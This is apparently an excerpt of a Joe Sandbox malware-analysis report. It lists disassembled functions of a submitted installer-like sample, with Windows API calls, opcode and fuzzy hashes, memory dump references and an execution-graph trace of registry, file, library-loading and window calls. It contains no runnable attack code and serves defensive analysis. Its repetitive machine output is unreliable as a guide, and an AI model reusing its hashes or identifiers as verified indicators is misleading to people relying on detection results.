                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360949225.000000000044C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2361060928.000000000044F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CGZL5y3D81OCbb2NABnHZhPM.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$_malloc_memset
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1563474556-0
                                                                                                                                                                                                                                                              • Opcode ID: 8db40c55e290dcdbb94a9150ee673ff121df60e81232016a808276624f151ab3
                                                                                                                                                                                                                                                              • Instruction ID: 62da757d27d30c4a2d352fb6d1cdf045b3a8a2ec57480c094bf6cd3996650e79
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8db40c55e290dcdbb94a9150ee673ff121df60e81232016a808276624f151ab3
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CD0186723453047AF220565A9C47F7B7BDCDBC5B95F150519FB09EB2C0D5A4BD008279
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 0040A041 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 004067BC: __getptd_noexit.LIBCMT ref: 004067BD
                                                                                                                                                                                                                                                                • Part of subcall function 004067BC: __amsg_exit.LIBCMT ref: 004067CA
                                                                                                                                                                                                                                                              • __amsg_exit.LIBCMT ref: 0040A06D
                                                                                                                                                                                                                                                              • __lock.LIBCMT ref: 0040A07D
                                                                                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 0040A09A
                                                                                                                                                                                                                                                              • InterlockedIncrement.KERNEL32(02071368), ref: 0040A0C5
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000C.00000002.2360179635.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360041485.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000040E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360949225.000000000044C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2361060928.000000000044F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CGZL5y3D81OCbb2NABnHZhPM.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2880340415-0
                                                                                                                                                                                                                                                              • Opcode ID: dd6e1441f4b84a572239d79ceea4069e832955cf0029aabb0d00b64bf41dc48f
                                                                                                                                                                                                                                                              • Instruction ID: 8d88837ca888eb7a3862d89fc4487393f02573397272efdacaee68a91431d7ee
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dd6e1441f4b84a572239d79ceea4069e832955cf0029aabb0d00b64bf41dc48f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF017C35E01B159BDA20AF25954675E7260AB01B14F18413BE8007B2C1CB3C6961CBDF
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00401CC0 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000000,?,00000000,004022BC,?,?,00000000), ref: 00401CE7
                                                                                                                                                                                                                                                              • _malloc.LIBCMT ref: 00401CF4
                                                                                                                                                                                                                                                              • _memset.LIBCMT ref: 00401CFF
                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00000000,004022BC,?,?,00000000), ref: 00401D13
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000C.00000002.2360179635.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360041485.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000040E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360949225.000000000044C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2361060928.000000000044F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CGZL5y3D81OCbb2NABnHZhPM.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$_malloc_memset
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1563474556-0
                                                                                                                                                                                                                                                              • Opcode ID: f1ed4db5ec469ee81c55a71d3d7a96df49b2b22931ab4cb5a200e3ae16af3a8d
                                                                                                                                                                                                                                                              • Instruction ID: cb786a35093b211d6184d0593a0389adbfd214d533acf2757ace1d99aadd41be
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f1ed4db5ec469ee81c55a71d3d7a96df49b2b22931ab4cb5a200e3ae16af3a8d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5EF0BB323452147FF2205B5A9D49FB777ECDF85B89F144055FA04EB2C1C5A1BD1183A9
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00401710 Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetSystemTime.KERNEL32 ref: 00401746
                                                                                                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 0040175C
                                                                                                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 00401768
                                                                                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 00401782
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000C.00000002.2360179635.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360041485.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000040E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360949225.000000000044C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2361060928.000000000044F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CGZL5y3D81OCbb2NABnHZhPM.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Time$System$File$__aulldiv
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3735792614-0
                                                                                                                                                                                                                                                              • Opcode ID: 8249901b8016d95a857edac7dcb86ed988be918a2ff04351d9d808f3cfce4957
                                                                                                                                                                                                                                                              • Instruction ID: 8c21f06872e26a5e7b59f257f75c123fd6dd8060246e91aa355ff782bd38c4e7
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8249901b8016d95a857edac7dcb86ed988be918a2ff04351d9d808f3cfce4957
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC012C76018351AAC300DF69C88099FB7F8EFD8344F004E1EF499A3220E670D249CBAB
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                                              Execution Coverage:16.1%
                                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                              Signature Coverage:15.5%
                                                                                                                                                                                                                                                              Total number of Nodes:1282
                                                                                                                                                                                                                                                              Total number of Limit Nodes:22
                                                                                                                                                                                                                                                              execution_graph 3876 402541 3877 401456 18 API calls 3876->3877 3878 40254d 3877->3878 3879 401456 18 API calls 3878->3879 3880 40255c 3879->3880 3881 402578 EnableWindow 3880->3881 3882 40256d ShowWindow 3880->3882 3883 4037d4 3881->3883 3882->3883 3884 403141 3887 407c08 3884->3887 3888 403155 CloseHandle 3887->3888 3889 401e43 3890 401456 18 API calls 3889->3890 3891 401e4f 3890->3891 3892 401456 18 API calls 3891->3892 3893 401e5e 3892->3893 3894 401400 18 API calls 3893->3894 3895 401e71 3894->3895 3898 401ee6 3895->3898 3902 407cde lstrlenA 3895->3902 3903 408d43 3905 408a96 3903->3905 3904 408cf0 3905->3904 3906 408b69 GlobalAlloc 3905->3906 3907 408b4d GlobalFree 3905->3907 3908 408c55 GlobalAlloc 3905->3908 3909 408c45 GlobalFree 3905->3909 3906->3904 3906->3905 3907->3906 3908->3904 3908->3905 3909->3908 3910 405c44 3911 405c8f 3910->3911 3912 405c6f 3910->3912 3914 405c9c GetDlgItem 3911->3914 3917 405d60 3911->3917 3975 407805 GetDlgItemTextA 3912->3975 3916 405cbc 3914->3916 3915 405c7f 3918 407d37 5 API calls 3915->3918 3922 405cd7 SetWindowTextA 3916->3922 3927 407935 3 API calls 3916->3927 3919 405c89 3917->3919 3924 407e06 18 API calls 3917->3924 3918->3919 3920 4060cd 3919->3920 3981 407805 GetDlgItemTextA 3919->3981 3999 404f0f 3920->3999 3976 404d65 3922->3976 3929 405dd9 SHBrowseForFolderA 3924->3929 3925 405eb6 3930 40815b 17 API calls 3925->3930 3932 405cc9 3927->3932 3929->3919 3934 405dfa CoTaskMemFree 3929->3934 3935 405ec0 3930->3935 3932->3922 3939 407cf2 3 API calls 3932->3939 3937 407cf2 3 API calls 3934->3937 3982 407cb6 lstrcpynA 3935->3982 3941 405e0c 3937->3941 3943 405cd6 3939->3943 3945 405e65 3941->3945 3949 407e06 18 API calls 3941->3949 3942 405edb 3946 408299 5 API calls 3942->3946 3943->3922 3980 4077fb SetDlgItemTextA 3945->3980 3954 405ee9 3946->3954 3950 405e34 lstrcmpiA 3949->3950 3950->3945 3952 405e51 3950->3952 3951 405ef2 3983 407cb6 lstrcpynA 3951->3983 3979 407ce8 lstrcatA 3952->3979 3954->3951 3960 4078ce 2 API calls 3954->3960 3962 405f45 3954->3962 3956 405f02 3957 407935 3 API calls 3956->3957 3958 405f10 GetDiskFreeSpaceA 3957->3958 3961 405fb9 MulDiv 3958->3961 3958->3962 3960->3954 3961->3962 3963 406060 3962->3963 3984 404da2 3962->3984 3965 406099 3963->3965 3966 403903 2 API calls 3963->3966 3997 404d44 EnableWindow 3965->3997 3966->3965 3969 4060ba 3969->3920 3998 404d05 SendMessageA 3969->3998 3975->3915 3977 407e06 18 API calls 3976->3977 3978 404d8c 3977->3978 3981->3925 3982->3942 3983->3956 3985 404db5 3984->3985 3986 407e06 18 API calls 3985->3986 3987 404e3c 3986->3987 3988 407e06 18 API calls 3987->3988 3989 404e51 3988->3989 3990 407e06 18 API calls 3989->3990 3991 404e65 3990->3991 4013 407cde lstrlenA 3991->4013 3997->3969 3998->3920 4000 404f2e GetWindowLongA 3999->4000 4010 404f27 3999->4010 4001 404f4a 4000->4001 4000->4010 4002 404f52 GetSysColor 4001->4002 4003 404f5c 4001->4003 4002->4003 4004 404f71 SetBkMode 4003->4004 4005 404f62 SetTextColor 4003->4005 4006 404f9c 4004->4006 4007 404f8f GetSysColor 4004->4007 4005->4004 4008 404fa2 SetBkColor 4006->4008 4009 404fb4 4006->4009 4007->4006 4008->4009 4009->4010 4011 404fd1 CreateBrushIndirect 4009->4011 4012 404fc7 DeleteObject 4009->4012 4011->4010 4012->4011 4014 403747 4015 401456 18 API calls 4014->4015 4018 4036cd 4015->4018 4016 4037a0 4017 407e06 18 API calls 4016->4017 4019 402a3c 4016->4019 4017->4019 4018->4014 4018->4016 4018->4019 4020 404ec8 lstrcpynA 4023 407cde lstrlenA 4020->4023 4024 4023c9 GetDlgItem GetClientRect 4025 401400 18 API calls 4024->4025 4026 402419 LoadImageA SendMessageA 4025->4026 4027 40246e DeleteObject 4026->4027 4028 40382f 4026->4028 4027->4028 3852 402e4b 3853 402e51 3852->3853 3854 401400 18 API calls 3853->3854 3855 402e74 3854->3855 3856 401400 18 API calls 3855->3856 3857 402e87 RegCreateKeyExA 3856->3857 3858 402ee4 3857->3858 3861 403677 3857->3861 3859 402f06 3858->3859 3860 402ee9 3858->3860 3863 402f24 3859->3863 3864 402f0b 3859->3864 3862 401400 18 API calls 3860->3862 3865 402ef5 3862->3865 3867 402f54 RegSetValueExA 3863->3867 3871 403d52 46 API calls 3863->3871 3873 401456 3864->3873 3872 407cde lstrlenA 3865->3872 3868 40307b RegCloseKey 3867->3868 3868->3861 3870 402f02 3870->3867 3871->3870 3874 407e06 18 API calls 3873->3874 3875 401477 3874->3875 4029 404a4c 4030 404a5e 4029->4030 4031 404a68 GlobalAlloc 4030->4031 4032 404a86 4030->4032 4031->4032 4033 4033cf FindClose 4034 401f51 4035 401400 18 API calls 4034->4035 4036 401f5d ExpandEnvironmentStringsA 4035->4036 4037 401f8a 4036->4037 4039 401f7c 4036->4039 4038 401f97 lstrcmpA 4037->4038 4037->4039 4038->4039 4040 4026d3 4041 401400 18 API calls 4040->4041 4042 4026df 4041->4042 4043 408123 2 API calls 4042->4043 4044 4026e8 4043->4044 4046 402704 4044->4046 4047 407be3 wsprintfA 4044->4047 4047->4046 4048 4016d4 4049 401cc4 4048->4049 4050 406fcb 23 API calls 4049->4050 4051 401cc9 4050->4051 4052 402bd6 4053 401400 18 API calls 4052->4053 4054 402be2 4053->4054 4055 401400 18 API calls 4054->4055 4056 402bf1 4055->4056 4057 401400 18 API calls 4056->4057 4058 402c00 4057->4058 4059 408123 2 API calls 4058->4059 4060 402c0b 4059->4060 4061 402c8d 4060->4061 4070 407cde lstrlenA 4060->4070 4063 406fcb 23 API calls 4061->4063 4067 402ca1 4063->4067 4078 406ed7 4079 406ef1 4078->4079 4080 406f0b 4078->4080 4079->4080 4081 406ef7 4079->4081 4082 406f13 IsWindowVisible 4080->4082 4083 406f31 4080->4083 4084 404bd7 SendMessageA 4081->4084 4085 406f21 4082->4085 4086 406f9d CallWindowProcA 4082->4086 4083->4086 4100 407cb6 lstrcpynA 4083->4100 4087 406f03 4084->4087 4097 406557 SendMessageA 4085->4097 4086->4087 4090 406f66 4101 407be3 wsprintfA 4090->4101 4092 406f78 4093 403903 2 API calls 4092->4093 4094 406f86 4093->4094 4102 407cb6 lstrcpynA 4094->4102 4096 406f9b 4096->4086 4098 406595 GetMessagePos ScreenToClient SendMessageA 4097->4098 4099 4065db 4097->4099 4098->4099 4099->4083 4100->4090 4101->4092 4102->4096 4103 4037d8 SendMessageA 4104 40380d InvalidateRect 4103->4104 4105 40382c 4103->4105 4104->4105 4113 40395e 4114 403973 SetTimer 4113->4114 4115 403999 4113->4115 4114->4115 4116 4039f0 4115->4116 4120 40392c MulDiv 4115->4120 4118 4039a5 wsprintfA SetWindowTextA 4121 4077fb SetDlgItemTextA 4118->4121 4120->4118 3211 402860 3212 402869 3211->3212 3213 402970 3211->3213 3230 401400 3212->3230 3215 40163b 23 API calls 3213->3215 3217 402a3b 3215->3217 3218 401400 18 API calls 3219 402884 3218->3219 3220 402890 LoadLibraryExA 3219->3220 3221 4028b8 GetModuleHandleA 3219->3221 3220->3213 3222 4028b6 3220->3222 3221->3220 3223 4028c8 GetProcAddress 3221->3223 3222->3223 3224 40292d 3223->3224 3226 4028dd 3223->3226 3238 406fcb 3224->3238 3228 4028ef 3226->3228 3235 40163b 3226->3235 3228->3217 3229 402962 FreeLibrary 3228->3229 3229->3217 3252 407e06 3230->3252 3233 40144b 3233->3218 3236 406fcb 23 API calls 3235->3236 3237 401654 3236->3237 3237->3228 3239 406fe2 3238->3239 3249 4070f3 3238->3249 3240 407002 3239->3240 3241 407e06 18 API calls 3239->3241 3293 407cde lstrlenA 3240->3293 3241->3240 3249->3228 3264 407e16 3252->3264 3253 407ef9 3254 40143a 3253->3254 3281 407cb6 lstrcpynA 3253->3281 3254->3233 3271 407d37 3254->3271 3256 407f25 GetVersion 3265 407f34 3256->3265 3257 407ee3 lstrlenA 3257->3264 3260 407fbb GetSystemDirectoryA 3260->3265 3261 407e06 11 API calls 3261->3264 3263 407fe1 GetWindowsDirectoryA 3263->3265 3264->3253 3264->3256 3264->3257 3264->3261 3266 407d37 5 API calls 3264->3266 3280 407be3 wsprintfA 3264->3280 3287 407cb6 lstrcpynA 3264->3287 3288 407ce8 lstrcatA 3264->3288 3265->3260 3265->3263 3265->3264 3267 407e06 11 API calls 3265->3267 3268 408002 SHGetSpecialFolderLocation 3265->3268 3282 407b3a RegOpenKeyExA 3265->3282 3266->3264 3267->3265 3268->3265 3269 408069 SHGetPathFromIDListA CoTaskMemFree 3268->3269 3269->3265 3278 407d48 3271->3278 3272 407dd5 3273 407dde CharPrevA 3272->3273 3274 407dfc 3272->3274 3273->3272 3274->3233 3275 407dc7 CharNextA 3275->3278 3277 407d9c CharNextA 3277->3278 3278->3272 3278->3275 3278->3277 3279 407db8 CharNextA 3278->3279 3289 4078a4 3278->3289 3279->3275 3280->3264 3281->3254 3283 407b81 RegQueryValueExA 3282->3283 3284 407bdc 3282->3284 3285 407bbc RegCloseKey 3283->3285 3284->3265 3285->3284 3287->3264 3290 4078b1 3289->3290 3291 4078c7 3290->3291 3292 4078bb CharNextA 3290->3292 3291->3278 3292->3290 3294 401860 3295 401400 18 API calls 3294->3295 3296 40186c 3295->3296 3313 407935 CharNextA CharNextA 3296->3313 3298 401902 3300 401942 3298->3300 3301 40190e 3298->3301 3299 4078a4 CharNextA 3312 401879 3299->3312 3304 40163b 23 API calls 3300->3304 3309 403677 3300->3309 3302 40163b 23 API calls 3301->3302 3303 40191a 3302->3303 3330 407cb6 lstrcpynA 3303->3330 3304->3309 3307 40192b SetCurrentDirectoryA 3307->3309 3310 4018dd GetFileAttributesA 3310->3312 3312->3298 3312->3299 3312->3310 3319 4082eb 3312->3319 3322 4076b0 CreateDirectoryA 3312->3322 3327 40774b CreateDirectoryA 3312->3327 3314 40795a 3313->3314 3315 4078a4 CharNextA 3314->3315 3318 407976 3314->3318 3316 40798a 3315->3316 3317 4078a4 CharNextA 3316->3317 3316->3318 3317->3318 3318->3312 3331 408299 GetModuleHandleA 3319->3331 3323 407710 3322->3323 3324 407714 GetLastError 3322->3324 3323->3312 3324->3323 3325 407723 SetFileSecurityA 3324->3325 3325->3323 3326 40773f GetLastError 3325->3326 3326->3323 3328 407775 3327->3328 3329 40776f GetLastError 3327->3329 3328->3312 3329->3328 3330->3307 3332 4082bb 3331->3332 3333 4082cc GetProcAddress 3331->3333 3337 40820e GetSystemDirectoryA 3332->3337 3335 4082e2 3333->3335 3335->3312 3336 4082c3 3336->3333 3336->3335 3338 40823c wsprintfA LoadLibraryExA 3337->3338 3338->3336 4122 4020e0 4123 40216e 4122->4123 4130 4020f0 4122->4130 4124 4021a1 GlobalAlloc 4123->4124 4125 402172 4123->4125 4126 407e06 18 API calls 4124->4126 4140 402127 4125->4140 4143 407cb6 lstrcpynA 4125->4143 4126->4140 4127 402101 4128 407e06 18 API calls 4127->4128 4131 402115 4128->4131 4130->4127 4133 40212e 4130->4133 4136 407836 MessageBoxIndirectA 4131->4136 4132 402189 GlobalFree 4132->4140 4141 407cb6 lstrcpynA 4133->4141 4135 402141 4142 407cb6 lstrcpynA 4135->4142 4136->4140 4138 402157 4144 407cb6 lstrcpynA 4138->4144 4141->4135 4142->4138 4143->4132 4144->4140 4145 4021e3 4146 401456 18 API calls 4145->4146 4147 4021ef 4146->4147 4148 401456 18 API calls 4147->4148 4149 4021fe 4148->4149 4150 402216 4149->4150 4151 401400 18 API calls 4149->4151 4152 40222e 4150->4152 4155 401400 18 API calls 4150->4155 4151->4150 4153 402245 4152->4153 4154 4022c6 4152->4154 4156 401456 18 API calls 4153->4156 4157 401400 18 API calls 4154->4157 4155->4152 4158 40224a 4156->4158 4159 4022cb 4157->4159 4160 401456 18 API calls 4158->4160 4161 401400 18 API calls 4159->4161 4162 40225d 4160->4162 4163 4022de FindWindowExA 4161->4163 4164 4022a9 SendMessageA 4162->4164 4165 402269 SendMessageTimeoutA 4162->4165 4167 402308 4163->4167 4164->4167 4165->4167 4166 402332 4167->4166 4169 407be3 wsprintfA 4167->4169 4169->4166 4170 403164 4171 401400 18 API calls 4170->4171 4172 403170 4171->4172 4178 407a78 GetFileAttributesA CreateFileA 4172->4178 4174 402530 4176 40253c 4174->4176 4177 407be3 wsprintfA 4174->4177 4177->4176 4178->4174 3798 401ae6 3799 401400 18 API calls 3798->3799 3800 401af2 3799->3800 3801 407ad4 2 API calls 3800->3801 3802 401aff 3800->3802 3801->3802 4179 401968 4180 401400 18 API calls 4179->4180 4181 401974 4180->4181 4182 401400 18 API calls 4181->4182 4183 401983 4182->4183 4184 401400 18 API calls 4183->4184 4185 401992 MoveFileA 4184->4185 4186 4019b2 4185->4186 4187 4019a6 4185->4187 4189 408123 2 API calls 4186->4189 4191 402a3c 4186->4191 4188 40163b 23 API calls 4187->4188 4187->4191 4188->4191 4190 4019c7 4189->4190 4190->4191 4192 408311 39 API calls 4190->4192 4192->4187 4193 40236a 4194 401456 18 API calls 4193->4194 4195 402376 4194->4195 4196 401456 18 API calls 4195->4196 4197 402385 GetDlgItem 4196->4197 4198 402530 4197->4198 4201 407be3 wsprintfA 4198->4201 4200 40253c 4201->4200 4202 4019ea 4203 401400 18 API calls 4202->4203 4204 4019f6 GetFullPathNameA 4203->4204 4207 401a25 4204->4207 4211 401a58 4204->4211 4205 403831 4206 401a7b GetShortPathNameA 4206->4205 4208 408123 2 API calls 4207->4208 4207->4211 4209 401a3e 4208->4209 4209->4211 4212 407cb6 lstrcpynA 4209->4212 4211->4205 4211->4206 4212->4211 4213 404fed 4214 405013 4213->4214 4215 405007 4213->4215 4217 405025 GetDlgItem GetDlgItem 4214->4217 4218 40509d 4214->4218 4215->4214 4216 40555f 4215->4216 4219 405564 SetWindowPos 4216->4219 4220 4055a6 4216->4220 4221 404d65 18 API calls 4217->4221 4222 4050c1 4218->4222 4232 403845 2 API calls 4218->4232 4223 4056a8 4219->4223 4224 4055ab ShowWindow 4220->4224 4225 4055cf 4220->4225 4226 405071 SetClassLongA 4221->4226 4227 404bd7 SendMessageA 4222->4227 4233 405134 4222->4233 4228 404f0f 8 API calls 4223->4228 4224->4223 4229 4055f1 4225->4229 4230 4055d7 DestroyWindow 4225->4230 4231 403903 2 API calls 4226->4231 4266 4050cd 4227->4266 4228->4233 4235 4055f6 SetWindowLongA 4229->4235 4236 40561c 4229->4236 4234 4053e3 4230->4234 4231->4218 4237 4050ef 4232->4237 4234->4233 4244 40553d ShowWindow 4234->4244 4235->4233 4236->4223 4238 405628 GetDlgItem 4236->4238 4237->4222 4239 4050f5 SendMessageA 4237->4239 4242 405650 SendMessageA IsWindowEnabled 4238->4242 4243 405641 4238->4243 4239->4233 4240 40537a DestroyWindow EndDialog 4240->4234 4241 403903 2 API calls 4241->4266 4242->4233 4242->4243 4246 405693 4243->4246 4247 4056f7 SendMessageA 4243->4247 4249 4056b1 4243->4249 4255 405647 4243->4255 4244->4233 4245 407e06 18 API calls 4245->4266 4246->4247 4246->4255 4247->4223 4250 4056d3 4249->4250 4251 4056ba 4249->4251 4253 403903 2 API calls 4250->4253 4252 403903 2 API calls 4251->4252 4252->4255 4253->4255 4254 404d65 18 API calls 4254->4266 4255->4223 4282 404cc8 4255->4282 4256 404d65 18 API calls 4257 4051bc GetDlgItem 4256->4257 4258 4051e7 ShowWindow 4257->4258 4257->4266 4258->4266 4260 40525a EnableMenuItem SendMessageA 4261 4052af SendMessageA 4260->4261 4260->4266 4261->4266 4264 4053c8 DestroyWindow 4264->4234 4265 405407 CreateDialogParamA 4264->4265 4265->4234 4267 405448 4265->4267 4266->4233 4266->4240 4266->4241 4266->4245 4266->4254 4266->4256 4266->4258 4266->4260 4266->4264 4270 407e06 18 API calls 4266->4270 4278 404d44 EnableWindow 4266->4278 4279 404c96 SendMessageA 4266->4279 4280 407cb6 lstrcpynA 4266->4280 4281 407cde lstrlenA 4266->4281 4269 404d65 18 API calls 4267->4269 4271 40545f GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4269->4271 4272 405314 SetWindowTextA 4270->4272 4273 403845 2 API calls 4271->4273 4274 403845 2 API calls 4272->4274 4275 4054ee 4273->4275 4274->4266 4275->4233 4276 4054fd ShowWindow 4275->4276 4277 404bd7 SendMessageA 4276->4277 4277->4234 4278->4266 4279->4266 4280->4266 4283 404cd6 4282->4283 4284 404cdc SendMessageA 4282->4284 4283->4284 4284->4223 4285 401771 SetForegroundWindow 4286 40219b 4285->4286 4287 4033f2 4288 403401 4287->4288 4291 40345f 4287->4291 4289 40340f FindNextFileA 4288->4289 4290 403429 4289->4290 4289->4291 4290->4291 4293 407cb6 lstrcpynA 4290->4293 4293->4291 3372 404375 SetErrorMode GetVersion 3373 4043a7 3372->3373 3374 40439b 3372->3374 3376 4043d9 3373->3376 3377 40820e 3 API calls 3373->3377 3375 408299 5 API calls 3374->3375 3375->3373 3378 408299 5 API calls 3376->3378 3379 4043c8 lstrlenA 3377->3379 3380 4043e5 3378->3380 3379->3373 3381 408299 5 API calls 3380->3381 3382 4043f2 InitCommonControls OleInitialize SHGetFileInfoA 3381->3382 3468 407cb6 lstrcpynA 3382->3468 3384 404457 GetCommandLineA 3469 407cb6 lstrcpynA 3384->3469 3386 40446f GetModuleHandleA 3387 404494 3386->3387 3388 4078a4 CharNextA 3387->3388 3389 4044ac CharNextA 3388->3389 3398 4044be 3389->3398 3390 404560 GetTempPathA 3470 4042bc 3390->3470 3393 404580 DeleteFileA 3479 403f03 GetTickCount GetModuleFileNameA 3393->3479 3394 4045a7 GetWindowsDirectoryA 3581 407ce8 lstrcatA 3394->3581 3396 4078a4 CharNextA 3396->3398 3398->3390 3398->3396 3401 404523 3398->3401 3400 4045dd 3571 404316 3400->3571 3580 407cb6 lstrcpynA 3401->3580 3407 40453d 3407->3390 3408 40465b 3509 4060fd 3408->3509 3409 40459a 3409->3400 3409->3408 3413 4078a4 CharNextA 3409->3413 3411 404844 3417 404836 ExitProcess 3411->3417 3418 408299 5 API calls 3411->3418 3412 404826 3599 407836 3412->3599 3415 404608 3413->3415 3420 404662 3415->3420 3423 40461c 3415->3423 3419 40485d 3418->3419 3422 408299 5 API calls 3419->3422 3421 4082eb 5 API calls 3420->3421 3425 404667 3421->3425 3426 40486c 3422->3426 3582 40815b 3423->3582 3598 407ce8 lstrcatA 3425->3598 3427 408299 5 API calls 3426->3427 3430 40487b 3427->3430 3435 4048a1 GetCurrentProcess 3430->3435 3451 4048be 3430->3451 3435->3451 3436 404649 3597 407cb6 lstrcpynA 3436->3597 3437 408299 5 API calls 3446 40493f 3437->3446 3442 404944 ExitWindowsEx 3442->3417 3445 404991 3442->3445 3603 403903 3445->3603 3446->3442 3446->3445 3451->3437 3468->3384 3469->3386 3471 407d37 5 API calls 3470->3471 3473 4042ce 3471->3473 3472 404312 3472->3393 3472->3394 3473->3472 3606 407cf2 lstrlenA CharPrevA 3473->3606 3476 40774b 2 API calls 3477 4042fd 3476->3477 3610 407ad4 3477->3610 3615 407a78 GetFileAttributesA CreateFileA 3479->3615 3481 403f5b 3508 404012 3481->3508 3616 407cb6 lstrcpynA 3481->3616 3483 403f87 3617 4078ce lstrlenA 3483->3617 3487 403fa8 GetFileSize 3489 403fce 3487->3489 3488 4040c3 3624 4039fe 3488->3624 3489->3488 3493 404006 3489->3493 3499 4039fe 31 API calls 3489->3499 3489->3508 3622 403ae9 ReadFile 3489->3622 3495 4039fe 31 API calls 3493->3495 3494 404172 GlobalAlloc 3498 404197 3494->3498 3495->3508 3497 404149 3501 403ae9 